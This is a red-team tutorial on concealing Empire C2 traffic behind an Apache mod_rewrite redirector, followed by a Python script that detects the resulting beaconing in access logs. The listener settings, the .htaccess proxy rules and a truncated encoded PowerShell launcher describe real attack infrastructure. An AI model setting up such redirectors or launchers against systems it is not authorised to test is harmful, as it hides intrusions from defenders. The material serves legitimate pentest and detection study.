Empire Redirector

Empire Redirector with Apache mod_rewrite

Redirector

  • when we pentest, once we have breached the network, the implant needs to connect back to our machine.
  • the C2 traffic comes in, but it has to do so silently.
  • if the C2 traffic looks suspicious, it is easy to spot.
  • many more reasons to hide the C2 server
  • several techniques to redirect your C2 traffic:
    • socat
    • iptables
    • apache mod_rewrite
  • choose wisely; this demo uses apache mod_rewrite
  • Set up the Empire listener
(Empire: listeners) > info New

New Options:

Name              Required  Value                                                    Description
----              --------  -----                                                    -----------
StagerURI         False                                                              URI for the stager. Must use /download/. Example: /download/stager.php
ProxyCreds        False     default                                                  Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate          False                                                              Date for the listener to exit (MM/dd/yyyy).
Name              True      New                                                      Name for the listener.
Launcher          True      powershell -noP -sta -w 1 -enc                           Launcher string.
DefaultProfile    True      /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko   Default communication profile for the agent.
DefaultLostLimit  True      60                                                       Number of missed checkins before exiting
Host              True      http://192.168.1.155:80                                  Hostname/IP for staging.
Port              True      8080                                                     Port for the listener.
WorkingHours      False                                                              Hours for the agent to operate (09:00-17:00).
CertPath          False                                                              Certificate path for https listeners.
DefaultJitter     True      0.0                                                      Jitter in agent reachback interval (0.0-1.0).
SlackChannel      False     #general                                                 The Slack channel or DM that notifications will be sent to.
BindIP            True      192.168.1.227                                            The IP to bind to on the control server.
UserAgent         False     default                                                  User-agent string to use for the staging request (default, none, or other).
StagingKey        True      b5195f448ed29a96415ae7a8babfa2d7                         Staging key for initial agent negotiation.
DefaultDelay      True      5                                                        Agent delay/reach back interval (in seconds).
SlackToken        False                                                              Your SlackBot API token to communicate with your Slack instance.
ServerVersion     True      Microsoft-IIS/7.5                                        Server header for the control server.
Proxy             False     default                                                  Proxy to use for request (default, none, or other).
  • Host is the IP of the redirector machine (the Apache host the agent talks to)
  • Port is the port on the machine that actually receives the payload traffic, i.e. the Empire machine
  • BindIP is the address of that same Empire machine
  • DefaultProfile (the URIs and User-Agent above) can be changed to avoid some detections; I use the default for testing

Setup Redirector Apache machine

  • enable the Apache modules the redirector needs (rewrite, proxy, proxy_http)
root@kali:/var/www/html# a2enmod rewrite proxy proxy_http
Enabling module rewrite.
Enabling module proxy.
Considering dependency proxy for proxy_http:
Enabling module proxy_http.
To activate the new configuration, you need to run:
  systemctl restart apache2
  • set up .htaccess in the web root
RewriteEngine On
# Only the URIs from the listener's DefaultProfile are proxied ([P]) to the Empire host (BindIP:Port).
# The original post had "new.php" here, which does not match the profile's /news.php and would
# send that agent traffic to the fallback redirect below instead of to Empire.
RewriteCond %{REQUEST_URI} ^/(admin/get.php|login/process.php|news.php)/?$
RewriteRule ^.*$ http://192.168.1.227:8080/%{REQUEST_URI} [P]
# Every other request is bounced away with a 302
RewriteRule ^.*$ http://google.com/? [L,R=302]
  • restart the web server (systemctl restart apache2) so the modules and rules take effect

Create a launcher from Empire

(Empire: listeners) > launcher powershell New
powershell -noP -sta -w 1 -enc ...
  • run it on the Windows machine
  • the agent talks to the web server, which proxies the profile URIs through to Empire and bounces everything else
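From the defender's side, the listener settings and the rewrite rules above describe a recognisable pattern: one client polling one of the DefaultProfile URIs every DefaultDelay seconds with no jitter (DefaultJitter 0.0) and the profile's Internet Explorer User-Agent, on a web server that answers every other path with a 302. The following Python script is an added example, not code from the original post or from the Empire project. It parses Apache combined-format access log lines (the sample lines are constructed here, not real traffic) and flags client/path pairs whose request interval is near-constant, alongside a count of how many non-profile requests were simply redirected. The thresholds `min_hits` and `max_cv` are assumptions chosen for the example.

```python
"""Spot beaconing through a mod_rewrite redirector in Apache access logs.

Added example (not from the original post). It looks for what the listener
options above imply: repeated requests from one client to a DefaultProfile
URI at a near-constant interval (DefaultDelay 5, DefaultJitter 0.0) with the
profile's User-Agent, while the redirector answers every other path with 302.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log lines in Apache "combined" format (not real traffic).
# 10.0.0.5 polls /admin/get.php every 5 s, 10.0.0.9 is an ordinary visitor
# who only ever receives the fallback 302, 10.0.0.7 hits a profile URI twice.
_UA_IE = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
_UA_FF = "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0"
SAMPLE_LOG = "\n".join([
    f'10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/get.php HTTP/1.1" 200 312 "-" "{_UA_IE}"',
    f'10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 302 - "-" "{_UA_FF}"',
    f'10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php HTTP/1.1" 200 204 "-" "{_UA_IE}"',
    f'10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /admin/get.php HTTP/1.1" 200 312 "-" "{_UA_IE}"',
    f'10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /robots.txt HTTP/1.1" 302 - "-" "{_UA_FF}"',
    f'10.0.0.5 - - [01/Jan/2024:10:00:10 +0000] "GET /admin/get.php HTTP/1.1" 200 312 "-" "{_UA_IE}"',
    f'10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /admin/get.php HTTP/1.1" 200 312 "-" "{_UA_IE}"',
    f'10.0.0.9 - - [01/Jan/2024:10:00:19 +0000] "GET /wp-login.php HTTP/1.1" 302 - "-" "{_UA_FF}"',
    f'10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /admin/get.php HTTP/1.1" 200 312 "-" "{_UA_IE}"',
    f'10.0.0.7 - - [01/Jan/2024:10:01:40 +0000] "GET /news.php HTTP/1.1" 200 204 "-" "{_UA_IE}"',
])

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Paths and User-Agent marker taken from the listener's DefaultProfile above.
PROFILE_PATHS = {"/admin/get.php", "/news.php", "/login/process.php"}
PROFILE_UA_MARKER = "Trident/7.0"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def find_beacons(lines, min_hits=4, max_cv=0.1):
    """Flag (client, path) pairs polled at a near-constant interval.

    cv is the coefficient of variation of the gaps between requests; 0.0 means
    no jitter at all, which is exactly what DefaultJitter 0.0 produces.
    """
    by_key = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e:
            by_key[(e["client"], e["path"], e["ua"])].append(e["ts"])
    findings = []
    for (client, path, ua), stamps in by_key.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({
                "client": client, "path": path, "hits": len(stamps),
                "interval": avg, "cv": cv,
                "profile_path": path in PROFILE_PATHS,
                "profile_ua": PROFILE_UA_MARKER in ua,
            })
    return findings


def redirect_summary(lines):
    """Count non-profile requests and how many of them got the fallback 302."""
    total = redirected = 0
    for line in lines:
        e = parse_line(line)
        if e and e["path"] not in PROFILE_PATHS:
            total += 1
            redirected += e["status"] == 302
    return redirected, total


if __name__ == "__main__":
    log_lines = SAMPLE_LOG.splitlines()
    for finding in find_beacons(log_lines):
        print(finding)
    print("non-profile requests redirected: %d/%d" % redirect_summary(log_lines))
```

On the sample data only 10.0.0.5 is flagged (five hits, 5 s apart, cv 0.0, profile path and profile User-Agent), while the two-hit client stays below `min_hits`, and all three non-profile requests were 302'd, which is the signature of a host that exists only to forward a handful of URIs. In a real deployment the same logic would run over proxy or web-server logs with a wider window, and a realistic DefaultJitter would raise the cv, so the threshold is something to tune rather than a fixed rule.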